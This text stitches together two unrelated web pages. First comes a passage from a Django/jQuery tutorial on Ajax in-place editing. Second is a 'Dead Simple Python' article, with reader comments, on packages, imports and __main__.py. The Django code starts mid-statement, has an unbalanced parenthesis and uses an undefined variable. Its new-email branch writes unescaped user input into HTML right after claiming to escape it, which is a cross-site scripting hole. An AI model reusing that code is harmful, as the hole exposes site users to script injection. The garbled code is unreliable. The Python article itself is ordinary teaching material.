{u'entity': entity, u'emails': emails})))jQuery In-place Editing Using Ajax The following view saves changes made via in-place edits: @ajax_login_required def save(request): try: html_id = request.POST[u'id'] value = request.POST[u'value'] except: html_id = request.GET[u'id'] value = request.GET[u'value'] if not re.match(ur'^\w+$', html_id): raise Exception(u'Invalid HTML id.') (For more resources on this subject, see here.) First we test, specifcally, for whether a new e-mail is being added. The last parsed token in that case will be the ID of the Entity the e-mail address is for. match = re.match(ur'EntityEmail_new_(\d+)', html_id) if match: model = int(match.group(1)) We create and save the new EntityEmail instance: entity = directory.models.Entity.objects.get( pk = model)) We log what we have done, and for a view servicing Jeditable Ajax requests, return the HTML that is to be displayed. In this case we return a new link, and re-run the script that applies in-place edit functionality to all appropriate classes, as dynamically added content will not have this happen automatically. Our motive is that people will sometimes hit Save and then realize they made a mistake they want to correct, and we need to handle this as gracefully as the case where the in-place edit is perfect on the frst try. We escape for display: directory.functions.log_message(u'EntityEmail for Entity ' + str(model) + u') added by: ' + request.user.username + u', value: ' + value + u'\n') return HttpResponse( u'<a class="edit_rightclick" id="EntityEmail_email_' + str(email.id) + u'" href="mailto:' + value + u'">' + value + u'</a>' + u'''<span class="edit" id="EntityEmail_new_%s"> Click to add email.</span>''' % str(email.id)) The else clause is the normal case. First it parses the model, field, and id: else: match = re.match(ur'^(.*?)_(.*)_(\d+)$', html_id) model = match.group(1) field = match.group(2).lower() id = int(match.group(3)) Then it looks up the selected model (under the directory module, rather than anywhere), fnds the instance having this ID, sets the instance's field value, and saves the instance. The solution is generic, and does the usual job that would be done by code like entity.name = new_name. selected_model = get_model(u'directory', model) instance = selected_model.objects.get(pk = id) setattr(instance, field, value) instance.save() Finally, we log the change and return the HTML to display, in this case simply the value. As with previous examples, we escape the output against injection attacks: directory.functions.log_message(model + u'.' + field + u'(' + str(id) + u') changed by: ' + request.user.username + u' to: ' + value + u'\n') return HttpResponse(escape(value)) Summary We have now gone from a basic foundation to continuing practical application. We have seen how to divide the labor between the client side and server side. We used this to make a profle page in an employee directory where clicking on text that can be edited enables in-place editing, and we have started to look at usability concerns. More specifcally, we have covered how to use a jQuery plugin, in our case Jeditable, in a solution for Ajax in-place editing. We saw how to use Jeditable in slightly different ways to more appropriately accommodate editable plain text and editable e-mail/URL links. We discussed the server-side responsibilities, including both a generic solution for when a naming convention is required. We looked at an example of customizing behavior when we want something more closely tailored to specifc cases (which often is part of solving usability problems well), and also how a detailed profle page can be put together. Further resources on this subject: - Basics of Exception Handling Mechanism in JavaScript Testing[article] - Multiple Templates in Django[article] - Getting Started with jQuery[article] - Implementing AJAX Grid using jQuery data grid plugin jqGrid[article]
https://www.packtpub.com/books/content/django-javascript-integration-jquery-place-editing-using-ajax
CC-MAIN-2015-32
refinedweb
3,160
56.96
One of the (many?) shortcomings of Java is, at least in my humble opinion, the lack of unsigned integers. This may seem a minor problem, but it becomes a real annoyance when you have to deal with bits and bytes. Consider the right shift. As a good C/C++ programmer you know that right shifting of a signed integer is generally bad. Java defined two bit-wise right shift operators: >> and >>>. The first extends the sign, so that -2 >> 1 evaluates to -1 and -2 >>> 1 evaluates to (-1 & 0x7FFFFFFF), i.e. the So far, so good. So you may be surprised from the result of the following code: class Surprise { public static void main( String[] args ) { int result = -1 >>> 32; System.out.println( "surprise: "+result ); } } I don’t want to spoil the result, so you may want to take some more time to think… Ready with your guess? Well Suprise.java prints -1. That’s because the right hand side argument of the >>> operator is masked implicitly by 0x1F (i.e. taking values just between 0 and 31 included). No warning is emitted during compilation, so you are pretty on your own – either you know or you don’t and trouble are ready to … byte you. 2 thoughts on “Java Magic Trick” Andrea says: Get back to Scala 😛 max says: object Surprise { } } def main( arg: Array[String] ) : Unit = { val result = -1 >>> 32 println( s”Suprise: $result” ) Scala is no better in this regard. (Hiding the kinks of the language under a library is an old trick to overcome the limitation of the language 🙂 ) Beside, I’m using Scala on a daily basis.
https://www.maxpagani.org/2019/03/24/java-magic-trick/
CC-MAIN-2022-21
refinedweb
273
71.85
The Japanese language is notorious for its sentence ending particles. Personal preference of such particles can be considered as a reflection of the speaker‘s personality. Such a preference is called "Kuchiguse" and is often exaggerated artistically in Anime and Manga. For example, the artificial sentence ending particle "nyan~" is often used as a stereotype for characters with a cat-like personality: Now given a few lines spoken by the same character, can you find her Kuchiguse? Each input file contains one test case. For each case, the first line is an integer N (2≤N≤100). Following are N file lines of 0~256 (inclusive) characters in length, each representing a character‘s spoken line. The spoken lines are case sensitive. For each test case, print in one line the kuchiguse of the character, i.e., the longest common suffix of all N lines. If there is no such suffix, write nai. 3 Itai nyan~ Ninjin wa iyadanyan~ uhhh nyan~ nyan~ 3 Itai! Ninjinnwaiyada T_T T_T nai #include<bits/stdc++.h> using namespace std; vector<string> v; int main() { int n; scanf("%d\n", &n); //注意要把换行符也读进来 int shortest = 500; string s; for(int i=0;i<n;i++) { getline(cin, s); if(s.size() < shortest) shortest = s.size(); reverse(s.begin(), s.end()); v.push_back(s); } bool right; int index = 0; for(int i=0;i<shortest;i++) { char ch = v[0][i]; right = true; for(int j=1;j<n;j++) { if(v[j][i] != ch) { right = false; break; } } if(right) index++; else break; } if(index == 0) cout << "nai"; else for(int i=index-1;i>=0;i--) cout << v[0][i]; return 0; }
http://www.voidcn.com/article/p-vkcgxbog-bza.html
CC-MAIN-2020-29
refinedweb
276
66.54
I am having some difficulty understanding how to use tags versus branches in git.? In what situations should I be using one versus the other? Tags are ref's that point to specific points in the git history. Tagging is usually used to capture a point in history that's used for a marked version release (i.e. v1.0.1). A tag is sort of a branch that does not change. Unlike branches, tags, once being created, don't have any further history of commits. From a technical point of view: tags reside in refs/tags/ namespace and can point to tag objects (annotated and optionally GPG signed tags) or on to commit object (less used light-weight tag for local names), or in very rare cases even to tree object or blob object (e.g. GPG signature). branches reside in refs/heads/ namespace and may point only to commit objects. The HEAD pointer should refer to a branch (symbolic reference) or on to a commit (detached HEAD or anonymous branch). remote-tracking branches reside in refs/remotes// namespace and follow ordinary branches in a remote repository.
https://intellipaat.com/community/21601/git-tag-vs-branch-how-is-a-tag-different-from-a-branch-in-git-which-should-i-use-here
CC-MAIN-2021-04
refinedweb
188
62.07
Hello everyone. I've just started University and had a c++ Assignment due 2 days ago so I've already lost 20% of my marks. Basically I've hit a roadblock and can't figure out how to use array values in an equation. The program needs to calculate the Resistance total (r) values of a parallel circuit. It needs to prompt the user for the value of resistor 1, then resistor 2 then resistor 3 and store those values in an array of size 3 (assignment criteria). I've got the array working however I need to use the array values in an equation and no matter what I try it won't work. So the program needs to do this.: Enter R1: Enter R2: Enter R3: Total resistance = 1/R1+1/R2+1/R3. Answer = total resistance. Here's the coding as you see I haven't done much so far. I've tried many different things even using r = 1/[0]+1/[1]+1/[2]. I have no idea why that doesn't work. That's my coding so far and it doesn't work properly, it prompts for the resistor values correctly then displays the answer however the answer is not evne close to been correct.That's my coding so far and it doesn't work properly, it prompts for the resistor values correctly then displays the answer however the answer is not evne close to been correct.Code:#include <iostream> using namespace std; int main() { int myArray[3]; //Array of 3 integars int i; for (i=0;i<3;i++) //0-3 { cout << "Enter the value of R" << i+1 << ": "; cin >> myArray[i]; } int r, r1, r2, r3; myArray[0] = r1; myArray[1] = r2; myArray[2] = r3; cout <<r1<<""; /*r = 1/r1+1/r2+1/r3; cout << r;*/ system("pause"); return 0; } Can anyone please tell me what I'm doing wrong?
http://cboard.cprogramming.com/cplusplus-programming/114582-desperate-help-needed-cplusplus-uni-assignment.html
CC-MAIN-2014-10
refinedweb
318
68.6
Modding a silicone cat lamp to have a nicer rainbow fade. First I wrote some simple C programs that made sure that all the connections to the LEDs worked and a little program that displayed one color when the sensor value is low and another when it is high. I already put parts of different concern in separate C files for later inconvenience. I wanted to keep the functionality that the beating of the cat changed the mode. This results in a very simple state machine with the sensor ping going low and high again as the only type of transition. That I made into an enum variable which is incremented in a interrupt service function. The problem in the first place was that there was the need for smooth color transitions. to accomplish that I went for an implementation of a sinusoidal HSB fade. To accomplish that on an Attiny in a fast and efficient manner I chose to use a lookup table which generated on python. Because right now I went with only doing 8 bit software PWM I chose an amplitude of 255. from math import cos, pi LUT_LEN = 512 LUT_AMP = 2**8-1 lut = [int(cos(i*pi/2/LUT_LEN)*LUT_AMP) for i in range(0,LUT_LEN)] print(lut) The printout can be copy pasted into C code. The result right now looks like this. The striped one can only see on camera of course due to aliasing. The original controller get's the charge status (charging or not charging) via a pin and accordingly makes an LED blink. The substitution for that is a wire bridging the ingoing and outgoing ping, resulting in the charge status LED glowing when the cat charges. Because the original controller has no IC markings and I couldn't determine the type, I decided to desolder it and replace it with an Attiny85. I soldered the DIP-8 version of this controller onto a double sided prototyping board and filled and wired the holes in the middle in a way that I can program it with the use of pogo pins. Then I hot glued it onto a place on the PCB where the LEDs wouldn't cast a shadow. The last step was to wire the power traces to the power pins, the RGBW traces to PB0..3 and the sensor trace to PB4. The cat is a LED lamp with a lithium battery cell that is to be charged via a micro USB port. With the push of a button next to micro USB port the cat can be turned on and off. By beating the body or the base of the cat, the mode is changed. The Modes are "warm white light on", "RGB color steps" and "LEDs off". The color steps are very annoying and the goal of this project was to replace this with pleasant color fading. On the base of the lamp is the main PCB which is single sided and holds basic components for battery charging and protection, the main IC which does all the smarts, some analog circuitry for the "beating sensor", transistors and resistors for the LEDs, and the LEDs themselves - four warm white ones and four RGB ones. Each color is connected in parallel. The beating sensor is a piezo element which is held in the middle of the base. Under the main PCB is the battery and an interfacing PCB which is connected via a 4 leads cable and holds the USB port, a switch and a LED which blinks when charged. The main IC does everything. It has contacts going in for the power, the charge status and the sensor and going out for the four colors and the charging status LED. Some pins are not used. Here you can see the footprint after removal and cleanup. In the picture the upper left pin is pin 1. This is relevant to my interests. This is such a great idea. Love it!
https://hackaday.io/project/27415-blinkencat
CC-MAIN-2018-13
refinedweb
663
78.59
Participant 1165 Points May 25, 2009 11:01 AM|darkknight187|LINK The stored procedure is part of it, but there's several other steps. And I think you were trying in the main members database, I would use the classifieds database in the members table. I'm quoting off the top of my head, so it could be wrong. But it should get you on the right track. First off you need to make a backup of your project just in case you screw up. Then in the classifieds database add a column to the members table named comment. I would set the new column as nvarchar(100) The 100 limits the characters allowed to be inserted into the database. Add to the storedprocedure insert member. Add to App_Code/BLL/Members (In the insert member section) Should be set as string, if you used nvarchar. Take note of what order you put comment, it's very important in the next step. And you will see an error until you do the next step. Open App_Code/DAL/members, add comment to the list. Make sure you change the properties too. Just compare to the others, and you should enter 100 for the max charachters here too. Still in the last file, right click on the background, and choose view code. Scroll down the insert members section, and add comment to it, here's where the order is important. And of course add to your register and myprofile page. Make sure you test if the user registers without adding a comment. Does that cause errors when viewed in myprofile? If so you should add a default on the register page. Good Luck -Daniel May 26, 2009 06:21 AM|tomehhh|LINK Hi, In aspnet_Membership table there is already a field named Comment - I would like to use that field. I have modified the stored procedure aspnet_Membership_CreateUser and here is the error I get: Procedure or function 'aspnet_Membership_CreateUser' expects parameter '@Comment', which was not supplied. ALTER PROCEDURE dbo.aspnet_Membership_CreateUser @ApplicationName nvarchar(256), @UserName nvarchar(256), @Password nvarchar(128), @PasswordSalt nvarchar(128), @PasswordQuestion nvarchar(256), @PasswordAnswer nvarchar(128), @Comment ntext, Here is the stored procedure: (I have modified order of fields in aspnet_Membership table so Comment field comes after PasswordAnswer): Whereever is mentioned PasswordAnswer I have added Comment field below. Thanks. T Participant 845 Points May 27, 2009 08:37 AM|Spider Master|LINK Hello again [:D] I think your approach is a little off course (in the wrong direction) With the aspnet default member database I would recommend never modifying this until such understanding is known to you. The database is used by aspnet server by using pre established code that can be overidden at run time how ever the functionality of inserting a comment to the users table is allready provided using MembershipUser. I would suggest rolling back to the orginal StoredProcedure and using the MembershipUser namespace with update methods to add in your comment. Hope this helps 3 replies Last post May 27, 2009 08:37 AM by Spider Master
https://forums.asp.net/t/1427189.aspx?adding+Comment+field+to+Register+aspx+and+to+MyProfile+aspx+page
CC-MAIN-2017-51
refinedweb
509
62.38
The worst part of tutorials is always their simplicity, isn't it? Rarely will you find one with more than one file, far more seldom with multiple directories. I've found that structuring a Python project is one of the most often overlooked components of teaching the language. Worse, many developers get it wrong, stumbling through a jumble of common mistakes until they arrive at something that at least works. Here's the good news: you don't have to be one of them! In this installment of the Dead Simple Python series, we'll be exploring import statements, modules, packages, and how to fit everything together without tearing your hair out. We'll even touch on VCS, PEP, and the Zen of Python. Buckle up! Setting Up The Repository Before we delve into the actual project structure, let's address how this fits into our Version Control System [VCS]...starting with the fact you need a VCS! A few reasons are... - Tracking every change you make, - Figuring out exactly when you broke something, - Being able to see old versions of your code, - Backing up your code, and - Collaborating with others. You've got plenty of options available to you. Git is the most obvious, especially if you don't know what else to use. You can host your Git repository for free on GitHub, GitLab, Bitbucket, or Gitote, among others. If you want something other than Git, there's dozens of other options, including Mercurial, Bazaar, Subversion (although if you use that last one, you'll probably be considered something of a dinosaur by your peers.) I'll be quietly assuming you're using Git for the rest of this guide, as that's what I use exclusively. Once you've created your repository and cloned a local copy to your computer, you can begin setting up your project. At minimum, you'll need to create the following: README.md: A description of your project and its goals. LICENSE.md: Your project's license, if it's open source. (See opensource.org for more information about selecting one.) .gitignore: A special file that tells Git what files and directories to ignore. (If you're using another VCS, this file has a different name. Look it up.) - A directory with the name of your project. That's right...our Python code files actually belong in a separate subdirectory! This is very important, as our repository's root directory is going to get mighty cluttered with build files, packaging scripts, virtual environments, and all manner of other things that aren't actually part of the source code. Just for the sake of example, we'll call our fictional project awesomething. PEP 8 and Naming Python style is governed largely by a set of documents called Python Enhancement Proposals, abbreviated PEP. Not all PEPs are actually adopted, of course - that's why they're called "Proposals" - but some are. You can browse the master PEP index on the official Python website. This index is formally referred to as PEP 0. Right now, we're mainly concerned with PEP 8, first authored by the Python language creator Guido van Rossum back in 2001. It is the document which officially outlines the coding style all Python developers should generally follow. Keep it under your pillow! Learn it, follow it, encourage others to do the same. (Side Note: PEP 8 makes the point that there are always exceptions to style rules. It's a guide, not a mandate.) Right now, we're chiefly concerned with the section entitled "Package and Module Names"... Modules should have short, all-lowercase names. Underscores can be used in the module name if it improves readability. Python packages should also have short, all-lowercase names, although the use of underscores is discouraged. We'll get to what exactly modules and packages are in a moment, but for now, understand that modules are named by filenames, and packages are named by their directory name. In other words, filenames should be all lowercase, with underscores if that improves readability. Similarly, directory names should be all lowercase, without underscores if at all avoidable. To put that another way... - Do This: awesomething/data/load_settings.py - NOT This: awesomething/Data/LoadSettings.py I know, I know, long-winded way to make a point, but at least I put a little PEP in your step. (Hello? Is this thing on?) Packages and Modules This is going to feel anticlimactic, but here are those promised definitions: Any Python ( .py) file is a module, and a bunch of modules in a directory is a package. Well...almost. There's one other thing you have to do to a directory to make it a package, and that's to stick a file called __init__.py into it. You actually don't have to put anything into that file. It just has to be there. There is other cool stuff you can do with __init__.py, but it's beyond the scope of this guide, so go read the docs to learn more. If you do forget __init__.py in your package, it's going to do something much weirder than just failing, because that makes it an implicit namespace package. There's some nifty things you can do with that special type of package, but I'm not going into that here. As usual, you can learn more by reading the documentation: PEP 420: Implicit Namespace Packages. So, if we look at our project structure, awesomething is actually a package, and it can contain other packages. Thus, we might call awesomething our top-level package, and all the packages underneath its subpackages. This is going to be really important once we get to importing stuff. Let's look at one a snapshot of my real-world projects, omission, to get an idea of how we're structuring stuff... case you're wondering, I used the UNIX program tree to make that little diagram above.) You'll see that I have one top-level package called omission, with four sub-packages: common, data, game, and tests. I also have the directory resources, but that only contains game audio, images, etc. (omitted here for brevity). resources is NOT a package, as it doesn't contain an __init__.py. I also have another special file in my top-level package: __main__.py. This is the file that is run when we execute our top-level package directly via python -m omission. We'll talk about what goes in that __main__.py in a bit. How import Works If you've written any meaningful Python code before, you're almost certainly familiar with the import statement. For example... import re It is helpful to know that, when we import a module, we are actually running it. This means that any import statements in the module are also being run. For example, re.py has several import statements of its own, which are executed when we say import re. That doesn't mean they're available to the file we imported re from, but it does mean those files have to exist. If (for some unlikely reason) enum.py got deleted on your environment, and you ran import re, it would fail with an error... Traceback (most recent call last): File "weird.py", line 1, in import re File "re.py", line 122, in import enum ModuleNotFoundError: No module named 'enum' Naturally, reading that, you might get a bit confused. I've had people ask me why the outer module (in this example, re) can't be found. Others have wondered why the inner module ( enum here) is being imported at all, since they didn't ask for it directly in their code. The answer is simple: we imported re, and that imports enum. Of course, the above scenario is fictional: import enum and import re are never going to fail under normal circumstances, because both modules are part of Python's core library. It's just a silly example. ;) Import Dos and Don'ts There are actually a number of ways of importing, but most of them should rarely, if ever be used. For all of the examples below, we'll imagine that we have a file called smart_door.py: # smart_door.py def close(): print("Ahhhhhhhhhhhh.") def open(): print("Thank you for making a simple door very happy.") Just for example, we will run the rest of the code in this section in the Python interactive shell, from the same directory as smart_door.py. If we want to run the function open(), we have to first import the module smart_door. The easiest way to do this is... import smart_door smart_door.open() smart_door.close() We would actually say that smart_door is the namespace of open() and close(). Python developers really like namespaces, because they make it obvious where functions and whatnot are coming from. (By the way, don't confuse namespace with implicit namespace package. They're two different things.) The Zen of Python, also known as PEP 20, defines the philosophy behind the Python language. The last line has a statement that addresses this: Namespaces are one honking great idea -- let's do more of those! At a certain point, however, namespaces can become a pain, especially with nested packages. foo.bar.baz.whatever.doThing() is just ugly. Thankfully, we do have a way around having to use the namespace every time we call the function. If we want to be able to use the open() function without constantly having to precede it with its module name, we can do this instead... from smart_door import open open() Note, however, that neither close() nor smart_door.close() will not work in that last scenario, because we didn't import the function outright. To use it, we'd have to change the code to this... from smart_door import open, close open() close() In that terrible nested-package nightmare earlier, we can now say from foo.bar.baz.whatever import doThing, and then just use doThing() directly. Alternatively, if we want a LITTLE bit of namespace, we can say from foo.bar.baz import whatever, and say whatever.doThing(). The import system is deliciously flexible like that. Before long, though, you'll probably find yourself saying "But I have hundreds of functions in my module, and I want to use them all!" This is the point at which many developers go off the rails, by doing this... from smart_door import * This is very, very bad! Simply put, it imports everything in the module directly, and that's a problem. Imagine the following code... from smart_door import * from gzip import * open() What do you suppose will happen? The answer is, gzip.open() will be the function that gets called, since that's the last version of open() that was imported, and thus defined, in our code. smart_door.open() has been shadowed - we can't call it as open(), which means we effectively can't call it at all. Of course, since we usually don't know, or at least don't remember, every single function, class, and variable in every module that gets imported, we can easily wind up with a whole lot of messes. The Zen of Python addresses this scenario as well... Explicit is better than implicit. You should never have to guess where a function or variable is coming from. Somewhere in the file should be code that explicitly tells us where it comes from. The first two scenarios demonstrate that. I should also mention that the earlier foo.bar.baz.whatever.doThing() scenario is something Python developers do NOT like to see. Also from the Zen of Python... Flat is better than nested. Some nesting of packages is okay, but when your project starts looking like an elaborate set of Matryoshka dolls, you've done something wrong. Organize your modules into packages, but keep it reasonably simple. Importing Within Your Project That project file structure we created earlier is about to come in very handy. Recall my omission project... my game_round_settings module, defined by omission/data/game_round_settings.py, I want to use my GameMode class. That class is defined in omission/common/game_enums.py. How do I get to it? Because I defined omission as a package, and organized my modules into subpackages, it's actually pretty easy. In game_round_settings.py, I say... from omission.common.game_enums import GameMode This is called an absolute import. It starts at the top-level package, omission, and walks down into the common package, where it looks for game_enums.py. Some developers come to me with import statements more like from common.game_enums import GameMode, and wonder why it doesn't work. Simply put, the data package (where game_round_settings.py lives) has no knowledge of its sibling packages. It does, however, know about its parents. Because of this, Python has something called relative imports that lets us do the same thing like this instead... from ..common.game_enums import GameMode The .. means "this package's direct parent package", which in this case, is omission. So, the import steps back one level, walks down into common, and finds game_enums.py. There's a lot of debate about whether to use absolute or relative imports. Personally, I prefer to use absolute imports whenever possible, because it makes the code a lot more readable. You can make up your own mind, however. The only important part is that the result is obvious - there should be no mystery where anything comes from. (Continued Reading: Real Python - Absolute vs Relative Imports in Python There is one other lurking gotcha here! In omission/data/settings.py, I have this line: from omission.data.game_round_settings import GameRoundSettings Surely, since both these modules are in the same package, we should be able to just say from game_round_settings import GameRoundSettings, right? Wrong! It will actually fail to locate game_round_settings.py. This is because we are running the top-level package omission, which means the search path (where Python looks for modules, and in what order) works differently. However, we can use a relative import instead: from .game_round_settings import GameRoundSettings In that case, the single . means "this package". If you're familiar with the typical UNIX file system, this should start to make sense. .. means "back one level", and . means "the current location". Of course, Python takes it one step further: ... means "back two levels", .... is "back three levels", and so forth. However, keep in mind that those "levels" aren't just plain directories, here. They're packages. If you have two distinct packages in a plain directory that is NOT a package, you can't use relative imports to jump from one to another. You'll have to work with the Python search path for that, and that's beyond the scope of this guide. (See the docs at the end of this article.) __main__.py Remember when I mentioned creating a __main__.py in our top-level package? That is a special file that is executed when we run the package directly with Python. My omission package can be run from the root of my repository with python -m omission. Here's the contents of that file: from omission import app if __name__ == '__main__': app.run() Yep, that's actually it! I'm importing my module app from the top-level package omission. Remember, I could also have said from . import app instead. Alternatively, if I wanted to just say run() instead of app.run(), I could have done from omission.app import run or from .app import run. In the end, it doesn't make much technical difference HOW I do that import, so long as the code is readable. (Side Note: We could debate whether it's logical for me to have a separate app.py for my main run() function, but I have my reasons...and they're beyond the scope of this guide.) The part that confuses most folks at first is the whole if __name__ == '__main__' statement. Python doesn't have much boilerplate - code that must be used pretty universally with little to no modification - but this is one of those rare bits. __name__ is a special string attribute of every Python module. If I were to stick the line print(__name__) at the top of omission/data/settings.py, when that module got imported (and thus run), we'd see "omission.data.settings" printed out. When a module is run directly via python -m some_module, that module is assigned a special value of __name__: "main". Thus, if __name__ == '__main__': is actually checking if the module is being executed as the main module. If it is, it runs the code under the conditional. You can see this in action another way. If I added the following to the bottom of app.py... if __name__ == '__main__': run() ...I can then execute that module directly via python -m omission.app, and the results are the same as python -m omission. Now __main__.py is being ignored altogether, and the __name__ of omission/app.py is "__main__.py". Meanwhile, if I just run python -m omission, that special code in app.py is ignored, since its __name__ is now omission.app again. See how that works? Wrapping Up Let's review. Every project should use a VCS, such as Git. There are plenty of options to choose from. Every Python code file ( .py) is a module. Organize your modules into packages. Each package must contain a special __init__.pyfile. Your project should generally consist of one top-level package, usually containing sub-packages. That top-level package usually shares the name of your project, and exists as a directory in the root of your project's repository. NEVER EVER EVER use *in an import statement. Before you entertain a possible exception, the Zen of Python points out "Special cases aren't special enough to break the rules." Use absolute or relative imports to refer to other modules in your project. Executable projects should have a __main__.pyin the top-level package. Then, you can directly execute that package with python -m myproject. Of course, there are a lot more advanced concepts and tricks we can employ in structuring a Python project, but we won't be discussing that here. I highly recommend reading the docs: - Python Reference: the import system - Python Tutorials: Modules - PEP 8: Style Guide for Python - PEP 20: The Zen of Python - PEP 240: Implicit Namespace Packages Thank you to grym, deniska (Freenode IRC #python), @cbrintnall , and @rhymes (Dev) for suggested revisions. Discussion (53) Great article, Jason I cannot figure out a problem, maybe you can share your ideas. I have the following structure: The main entry point is cmake_project_creator/project_creator.pyasking for a couple of parameters. If I try to invoke it from Pycharm, everything is fine. The tests running by nosetests --with-coverage --cover-eraserunning fine. But if I try to invoke cmake_project_creator/project_creator.pyfrom the terminal, this is what I get: Do you have any idea what can be the issue? Absolutely. Your package needs a dedicated entry point for any imports off cmake_project_creatorto work. Add __main__.pyto cmake_project_creator/. Your __main__.pyfile should look something like this: Then, you can invoke the package directly with... python3 -m cmake_project_creator Thanks a lot, Jason! This partly solved my problem. Now I can run for example python3 -m cmake_project_creator -cwhere -cis a parameter and it works like a charm. But after adding the correct shebang and execution rights, I still cannot simply run ./cmake_project_creator/project_creator.py -cas I have the same failure of : Do I really have to manipulate sys.pathfor that? As a rule, never ever ever ever EVER manipulate sys.path to solve Python import issues. It has some pretty serious and nasty side-effects that can break other programs. You shouldn't invoke modules within a package like this. Instead, I'd recommend adding command-line argument support to your __main__.py, via argparse. With __main__.pybecoming the dedicated entry point, you should update it further to have a dedicated main()function, like this: The sole entry point to your package should be python3 -m cmake_project_creator, or an entry point script that invokes cmake_project_creator.main() Ok, thanks. Yes, I've been already using argparse to get the CL arguments. So one option is to use the -moption and the other way I managed to make it work is to add the repo-root to the PYTHONPATH, which could be done by a setup.py and most probably it would be OK to have it in a virtualenv. Thanks once more! Well, like I said, changing the path is always wrong. Yes, even in a virtualenv, especially since you can't guarantee that it'll always be run in one by another user. So, you only have one option, being the one I described. But, shrug, I've said my piece. I got your point and at the same time, in general, I don't believe in "having only one option". My problem with invoking a product with -m is twofold. One, it's not at all user-friendly, and the other is that it's leaking an abstraction. The product is implemented as a module with that name. Following your recommendation not to change any path variable, I found to way to overcome this. 1) I wrap the python3 -m cmake_project_creatorinto a shell script. As such users don't have to bother with -m, not even with pretending the module or script name with python3. On the other hand, it's not very portable (what about Win users for example?), this might or might not be acceptable. In my case, it would be. 2) I managed to invoke the module with runpy.run_module("cmake_project_creator", run_name='__main__')from another python script that given a correct shebang I can simply call ./run.py <args>. To me this seems ideal as I keep the invocation (from a user perspective) as simple as possible and as portable as possible and I encapsulate both the module name and the fact that the product is implemented as a module. PS: The product is going to be completely free, with the word product I only want to emphasize that it's meant to be used by people who might not even know with python -m is or python at all. That's why you have an entry point script, or even several, as I alluded to earlier. You can use your setup.pyto provide those, and those scripts can even be named such as you describe. But editing the Python path is still always wrong, for technical reasons. Python quite often is meant to have only one right way of doing something. The language is built that way. As I haven't yet been able to write the article on setup.py, please read this article by Chris Warrick: chriswarrick.com/blog/2014/09/15/p... Thanks for the recommendation. I'm definitely going to read it as that's pretty much my next thing to do, understand what I need to put in the setup.py. Thanks again! Hi! Firstly great article. This has been one of the clearest examples of how it should be done. Thanks. I am not sure whether this is an edge case, but I have a structure that looks like this: Both generate_data.py and send_data.py reference functions in local_utilities.py. The issue I have, more often then not, I would be calling send_data.py or generate_data.py I know that if I call either them specifically, I will need to add a reference to be able to import local_utilities. Does this go against the general accepted practice? Would it be better to either separate them into different projects (I would like to keep all the code together) or use an argparser in __main__and call the respective module using args? Thanks Ashley Hi Ashley, Sorry for the tremendous delay in reply. So, just to be clear, you're wanting to be able to call generate_data.pyand send_data.pydirectly, and those are supposed to be able to import a module from elsewhere in the project? If so, I would actually consider why you want to execute those modules directly. If you're simply wanting to be able to execute the two separately from the command-line, it may be worth fleshing out __main__.pyto accept a command-line argument, so python3 -m generateandsend sendor python3 -m generateandsend generatewill execute what you want. That'll also be the easiest solution. That way, you're always executing the top-level package ( generateandsend) In fact, I'm not entirely sure off the top of my head how to get multiple projects to talk to one another within a shared directory! I know it has to do with PYTHONPATH, but I think that will necessitate more research on my part. ;) Thanks for replying (& no problem on the delay - we all have a life to live!). I have thought about this more and agree - Why is it that I want to call them separately, where a parameter will suffice. So, I have abandoned the idea and gone with the python3 -m generateandsend generateapproach Cheers for the reply though. Appreciated. I also have one more question - if I wanted to include an ini/configuration file in a resources folder, how would I import it? Thanks I like to put all such non-code files in a project subdirectory (not a package) called resources, and then use the built-in package pkg_resourcesto access it. For example, in my omissionproject, the module omission/game/content_loader.pyneeds to load the text file omission/resources/content/content.txt. I do that with... Simple as that! P.S. If you find yourself needing to access files outside of your project directory, say, in the user's home directory, I recommend the package appdirs. Again, thanks for the reply. I've had a play with this one. Considering I am dealing with an ini file, it appears that configparser does what I want. This is the snippet I've come up with: Is hard coding the relative path in that way frowned apon? Most certainly, especially because you have to account for differences in path format between operating systems. I'd recommend incorporating pkg_resourcesinto your approach above. I believe that will work? You'll have to check how config.read()handles an absolute path. Beautiful. Thanks. I had to massage it a little and remove os.pardir, as it was giving me a false directory on my windows machine ( C:\tmp\generateandsend\..\Resources\generateandsend.ini). The resultant path variable now looks like: I just need to test this on my Linux box Cheers again. Send the bill to...... 😉 Hi Jason, nice article! Just a question: I've noticed you didn't talk about namespace packages. Is it because it might be outside the scope of a "dead simple" intro? I'm mentioning it because I believe they are a simpler concept for a new developer, as in: folders are packages, if you need initialization code for such package, add a __init__.py, otherwise you can't totally ignore the file. I'm over simplifying here of course. Thank you! That was something I actually didn't know about. Thanks for the link! It is probably more advanced than I want to go in the article series, but thanks for parking it in a comment anyhow. I'll look at this again later, and see if it might be worth adding to the guide after all. Thank you! An example: You can read more about it here. My tree example: ---src init.py main.py ------game ---------cards98.py ------reinforced ---------rl_agent.py ------supervised Readme.md License.md I can not reach parent module, from rl_agent.py I added some init.py but it does not solves. I have tried: from game.cards98 import GameCards98 from src.game.cards98 import GameCards98 And all I got is ModuleNotFoundError: No module named 'src' This works fin in pycharm, but not in idle :/ This structure should work: You need __init__.pyunder each directory that you want to use as a package. Then, from rl_agent.py, you should be able to use this import: I know it should work, but it does not. I got __init__.pyeverywhere and __main.py__in top level. Do I need to run it with -m param? I am definitely missing something. I was running scripts from top level to combine modules, but It can get messy sometimes :P This is my repo: Github Cards98 It shouldn't be messy. But, yes, you'd need to invoke your top-level package (not your top-level script.) By the by, I recommend renaming srcto your project name, cards98, and then renaming the subpackage by the same name to something like game. Yes, now it is working. python -m cards98 Well... but only for invoking top level in console. It does not work for normal execution, like clicking 2 times __main.py__with mouse. This also makes debugging and testing harder, cause I have to change it always in __main__.py. Where can I use it? I think it just complicates everything. Thanks for help in understanding this This is, to my knowledge, the official (and only) way to structure a Python project. There are two to create an executable file to start everything. Option 1: Native Script Many Python projects offer a Bash script (on UNIX-like systems) or a Windows .batfile that will run the python3 -m cards98command. I see this a lot. Option 2: Python Script This is the method I'd recommend, as it's the most portable. Outside of your top-level package, you can write a separate Python script, such as run.pyor cards98.py, and then use that to execute your main function. For example, in cards98/__main__.py, you can put this... And then, outside of the cards98package, create the file cards98.py, with the following: To start your Python application, just double-click cards98.py. P.S. Thanks for bringing up this situation. I realized I never addressed it in the book! Great introduction. I have one question: you have testsinside the project directory, while this guide places both docsand testsinto the git root. Are there any up- or down-sides to either of the choices? My method just makes the imports a lot easier. You'll notice that the guide you linked to requires some complex imports for the tests to work, whereas my approach requires nothing of the sort, since tests are part of the module. I suppose if you absolutely don't want to ship tests as part of your finished product, that might justify the other approach. That said, I prefer to always ship tests in the project; it makes debugging on 